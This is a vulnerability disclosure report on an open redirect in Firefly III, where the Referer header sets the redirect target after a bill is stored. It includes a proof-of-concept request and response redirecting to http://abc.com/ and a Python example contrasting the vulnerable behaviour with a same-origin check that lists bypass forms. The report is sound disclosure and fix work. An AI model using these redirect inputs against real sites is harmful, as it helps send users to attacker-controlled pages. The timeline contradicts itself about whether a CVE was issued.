Open Redirect in firefly-iii/firefly-iii

Valid

Reported on Oct 1st 2021


Steps:

  1. Log in to the application, navigate to the bills section, create a bill and capture the request.

Web applications use different techniques to redirect users to the next page: the target may come from a URL query parameter, from a request header value, from JavaScript, or from backend code. In this application, the value of the "Referer" request header was used as the target of the redirect to the next page, so a client that controls that header controls where the 302 points.

Original Request:

POST /bills/store HTTP/1.1
Host: demo.firefly-iii.org
...

Original Response:

HTTP/1.1 302 Found
location: https://demo.firefly-iii.org/bills/create
...

Modified Request:

POST /bills/store HTTP/1.1
Host: demo.firefly-iii.org
Referer: http://abc.com/
...

Modified Response:

HTTP/1.1 302 Found
location: http://abc.com/

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://abc.com/'" />
<title>Redirecting to http://abc.com/</title>
</head>
<body>
Redirecting to <a href="http://abc.com/">http://abc.com/</a>.
</body>
</html>
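The following is an added example, not Firefly III's code and not the fix landed in commit 8662df. It reproduces the behaviour shown above (the Referer value is copied straight into the Location header) next to a same-origin check that only accepts a "back" target on the application's own scheme and host and otherwise falls back to a fixed local path. The application origin is taken from the Host header in the report and the fallback path from the original response; the function names and the sample Referer values other than http://abc.com/ are constructed for this example.

```python
from urllib.parse import urlsplit

# Origin of the application as seen in the report's Host header (assumption:
# the app is served over https on that host).
APP_ORIGIN = "https://demo.firefly-iii.org"
# Where the original, unmodified response redirected to.
FALLBACK_PATH = "/bills/create"


def vulnerable_redirect_target(referer, fallback=FALLBACK_PATH):
    """Mirrors the vulnerable behaviour in the report: whatever the client
    sent as Referer becomes the Location header, so 'http://abc.com/' is
    returned unchanged."""
    return referer if referer else fallback


def safe_redirect_target(referer, app_origin=APP_ORIGIN, fallback=FALLBACK_PATH):
    """Return a redirect target that stays on the application's own origin.

    Every check that fails sends the user to `fallback` instead of to the
    Referer, which removes the open redirect while keeping the
    'go back to the previous page' behaviour for legitimate requests.
    Only the path and query of an accepted Referer are returned, so the
    Location header can never carry a foreign scheme or host.
    """
    if not referer:
        return fallback
    # Browsers treat backslashes as slashes but urlsplit does not, and CR/LF
    # would allow header injection; reject rather than try to normalise.
    if any(ch in referer for ch in "\\\r\n"):
        return fallback
    try:
        ref = urlsplit(referer)
        app = urlsplit(app_origin)
    except ValueError:
        return fallback
    # Scheme-relative ('//abc.com/') or foreign-scheme targets are rejected.
    if ref.scheme.lower() != app.scheme.lower():
        return fallback
    # Userinfo trick: 'https://demo.firefly-iii.org@abc.com/' really goes to abc.com.
    if "@" in ref.netloc:
        return fallback
    # Exact host (and port) match; 'demo.firefly-iii.org.abc.com' does not match.
    if ref.netloc.lower() != app.netloc.lower():
        return fallback
    target = ref.path or "/"
    if ref.query:
        target += "?" + ref.query
    return target


if __name__ == "__main__":
    # Constructed sample Referer values; the first is the one from the report.
    samples = [
        "http://abc.com/",
        "https://demo.firefly-iii.org/bills/create",
        "https://demo.firefly-iii.org/bills?page=2",
        "//abc.com/",
        "https://demo.firefly-iii.org@abc.com/",
        "https://demo.firefly-iii.org.abc.com/",
        None,
    ]
    for ref in samples:
        print(f"{str(ref):48} vulnerable -> {vulnerable_redirect_target(ref)!r:48}"
              f" safe -> {safe_redirect_target(ref)!r}")
```

Running the block prints, for each sample, the Location the vulnerable handler would emit next to the one the checked handler emits; the report's `http://abc.com/` becomes `/bills/create` under the safe version, and the look-alike hosts, scheme-relative and userinfo forms are all sent to the fallback as well.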

We have contacted a member of the firefly-iii team and are waiting to hear back 2 years ago
James Cole validated this vulnerability 2 years ago
takester has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole marked this as fixed with commit 8662df 2 years ago
James Cole has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome (Admin), 2 years ago:

CVE published! 🎊

takester (Researcher), 2 years ago:

Thanks 🎊